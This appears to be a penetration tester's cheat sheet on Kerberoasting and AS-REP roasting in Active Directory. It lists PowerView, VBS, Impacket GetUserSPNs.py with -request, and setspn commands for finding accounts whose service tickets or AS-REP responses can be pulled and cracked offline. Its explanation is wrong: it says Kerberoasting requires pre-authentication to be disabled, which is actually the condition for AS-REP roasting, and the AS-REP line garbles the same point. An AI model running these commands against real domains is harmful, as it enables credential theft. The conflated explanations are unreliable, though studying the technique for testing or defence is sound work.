Roasting

Finding Kerberoastable users

It requests a TGS and needs kerberos pre authentication to be disabled.
Kerberoasting will not work for COMPUTER$ account as the service ticket is encrypted with the machine account’s password.
But if the SPN requested is registered for a user account rather than a computer account, the user’s password is used to encrypt the service ticket.

Powerview

Get-DomainUser -SPN -Properties distinguishedname,serviceprincipalname [-Domain FOREIGN]

VBS

cscript.exe GetUserSPNs.vbs

Impacket

GetUserSPNs.py <domain_name>/<username>:<password> -dc-ip <dc_ip> -request

Manually

This will produce a quite huge output and will need manually triage (check for USER accounts)

setspn -T <DOMAIN> -F -Q */*

ASREP Roasting

AS-REP requests a TGT but not a TGS. Kerberos pre authentication does not need to be enable.

PowerView

Get-DomainUser -PreauthNoRequired -Properties distinguishedname